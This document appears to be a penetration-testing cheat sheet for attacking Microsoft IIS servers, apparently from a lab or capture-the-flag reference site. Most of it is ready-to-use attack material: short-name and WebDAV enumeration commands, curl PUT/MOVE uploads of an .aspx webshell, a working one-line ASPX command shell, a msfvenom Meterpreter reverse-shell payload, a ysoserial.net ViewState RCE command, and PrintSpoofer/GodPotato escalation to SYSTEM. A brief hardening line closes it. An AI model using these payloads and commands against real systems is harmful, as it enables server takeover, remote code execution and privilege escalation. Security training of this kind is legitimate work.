IIS
aka Microsoft IIS, inetpub, aspnet
Microsoft's web server for ASP.NET. web.config holds connection strings and the machineKey (ViewState RCE), short-name (tilde) scanning reveals hidden files, WebDAV lets you PUT a shell, and an app-pool shell with SeImpersonate goes to SYSTEM.
Ports
| Port | Proto | Notes |
|---|---|---|
80 | tcp | HTTP |
443 | tcp | HTTPS |
Fingerprint
- Server: Microsoft-IIS/<version> header
- X-Powered-By: ASP.NET; .aspx/.asmx extensions
Key files
| Path | Holds | Sensitive |
|---|---|---|
web.config | connectionStrings + machineKey (validationKey/decryptionKey) | sensitive |
C:\inetpub\wwwroot\ | web root | |
C:\inetpub\logs\LogFiles\ | IIS request logs |
Service users
IIS APPPOOL\<pool>NT AUTHORITY\IUSR
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2017-7269 | WebDAV ScStoragePathFromUrl buffer overflow RCE on IIS 6.0 |
Exploitation primitives
- Short-name (~) scan to reveal hidden .aspx/.zip/.bak files
- WebDAV PUT (or PUT+MOVE) to drop an .aspx webshell
- Leaked machineKey → ViewState deserialization RCE with ysoserial.net
- App-pool shell holds SeImpersonate → PrintSpoofer/GodPotato to SYSTEM
Overview
IIS serves ASP.NET on Windows. The recurring wins: find hidden files by short-name, drop a webshell via WebDAV or an upload, pull web.config for the machineKey to forge a malicious ViewState, and once you’re the app pool, ride SeImpersonate to SYSTEM.
Fingerprint
Confirm IIS and its version:
curl -sI http://<TARGET>/ | grep -i -E 'server|x-powered|x-aspnet'Short-name (tilde) enumeration
IIS leaks 8.3 short names via the ~ trick — reveals hidden .aspx, backups and archives even when directory listing is off.
Modern scanner:
shortscan http://<TARGET>/Classic Java scanner:
java -jar iis_shortname_scanner.jar 2 20 http://<TARGET>/Then brute the full names from the recovered prefixes:
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://<TARGET>/FUZZ -mc 200WebDAV
Check whether WebDAV (and PUT) is enabled:
davtest -url http://<TARGET>nmap -p80 --script http-webdav-scan,http-iis-webdav-vuln <TARGET>Upload a webshell directly:
curl -X PUT http://<TARGET>/shell.aspx --data-binary @shell.aspxIf .aspx is blocked on PUT, upload as .txt then MOVE it:
curl -X MOVE -H "Destination: http://<TARGET>/shell.aspx" http://<TARGET>/shell.txtIIS 6.0 only — the WebDAV overflow (CVE-2017-7269):
msf > use exploit/windows/iis/iis_webdav_scstoragepathfromurlASPX webshell
A minimal command webshell to drop:
<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe","/c "+Request["c"]); %>Or a full Meterpreter:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f aspx -o shell.aspxweb.config → ViewState RCE
Read web.config (LFI, short-name hit, or once you have any file read) for the machineKey:
curl -s http://<TARGET>/web.config | grep -i machineKeyWith the validationKey + decryptionKey, forge a malicious __VIEWSTATE for RCE (ysoserial.net):
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e <BASE64_CMD>" --path="/page.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<DECRYPTIONKEY>" --validationalg="SHA1" --validationkey="<VALIDATIONKEY>"POST the output as the __VIEWSTATE parameter to the target page. (No machineKey? if the app uses a default/weak key, Blacklist3r can recover it.)
Local privesc (app-pool → SYSTEM)
An IIS shell runs as IIS APPPOOL\<pool>, which holds SeImpersonate — cash it in for SYSTEM (full payloads in Windows Privilege Escalation):
PrintSpoofer.exe -i -c cmdGodPotato-NET4.exe -cmd "cmd /c whoami"Hardening
Keep the machineKey secret and unique, disable WebDAV/short-names if unused, run app pools least-privileged (deny SeImpersonate where possible), and patch.
Seen on these machines 2
